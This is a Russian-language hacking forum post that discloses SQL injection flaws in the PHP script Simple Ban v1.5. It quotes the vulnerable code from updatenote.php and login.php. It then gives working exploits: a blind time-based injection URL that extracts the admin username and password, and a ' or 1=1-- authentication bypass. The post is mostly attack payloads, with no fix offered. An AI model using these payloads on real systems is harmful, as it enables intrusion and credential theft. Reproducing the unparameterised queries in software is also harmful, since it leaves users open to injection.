Показать сообщение отдельно

  #9  
Старый 03.06.2009, 09:42
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip

Blind SQL-injection(требования: magic_quotes=off)
updatenote.php

уязвимый код:
PHP код:
$id $_GET["fieldname"];
$note $_GET["content"];
mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert"); 
эксплуатирование:
Код:
updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+
в случае истинности условия получаем небольшую задержку




bypass(требования: magic_quotes=off)
login.php
уязвимый код:
PHP код:
$user $_POST['user'];
$pass $_POST['pass'];

if(
$_POST['login']){
    
// QUERY ADMIN DATABASE
    
$getlogin "SELECT * FROM admin WHERE user='$user' and pass='$pass'";
    
$getlogin2 mysql_query($getlogin); 
эксплуатирование:
логинимся с именем:
' or 1=1--



(с) Iceangel_

Последний раз редактировалось Iceangel_; 03.06.2009 в 09:47..
 
Ответить с цитированием